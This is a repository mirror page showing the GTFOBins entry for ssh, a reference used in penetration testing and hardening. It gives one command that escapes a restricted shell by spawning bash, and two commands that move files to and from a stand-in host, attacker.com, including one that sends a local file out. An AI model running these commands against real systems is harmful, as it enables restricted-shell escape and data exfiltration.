This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-06 11:45:08 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
0047d8bfb7f62058fed3d5702f38c0394bfc9b59
GTFOBins.github.io
/
_gtfobins
/
ssh.md
Emilio Pinna
b857c98f92
Use target.com and attacker.com
2018-05-24 21:05:11 +01:00
577 B
Raw
Blame
History
functions
functions
exec-interactive
download
upload
description
code
Reconnecting may help bypassing restricted shells.
ssh localhost /bin/bash --noprofile --norc
description
code
Fetch a remote file from a SSH server.
HOST=user@attacker.com
RPATH=file_to_get LPATH=where_to_save ssh $HOST "cat $RPATH" > $LPATH
description
code
Send local file to a SSH server.
HOST=user@attacker.com
RPATH=where_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH
Reference in New Issue
View Git Blame
Copy Permalink